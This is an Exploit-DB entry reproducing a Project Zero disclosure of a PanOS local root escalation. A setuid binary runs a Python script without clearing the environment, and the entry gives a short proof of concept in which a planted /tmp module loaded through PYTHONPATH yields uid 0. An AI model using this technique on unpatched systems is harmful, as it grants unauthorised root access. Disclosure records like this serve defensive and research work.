Palo Alto Networks PanOS - 'root_trace' Local Privilege Escalation

EDB-ID:

40788




Platform:

Linux

Date:

2016-11-18


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

GET CERTIFIED

Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=912

The setuid root executable /usr/local/bin/root_trace essentially just does setuid(0) then system("/usr/local/bin/masterd"), which is a python script:

$ ls -l /usr/local/bin/root_trace 
-rwsr-xr-x 1 root root 12376 Oct 17  2014 /usr/local/bin/root_trace

As the environment is not scrubbed, you can just do something like this:

$ cat /tmp/sysd.py
import os
os.system("id")
os._exit(0);

$ PYTHONPATH=/tmp root_trace
uid=0(root) gid=502(admin) groups=501(noradgrp),502(admin)

This was fixed by PAN:

http://securityadvisories.paloaltonetworks.com/Home/Detail/67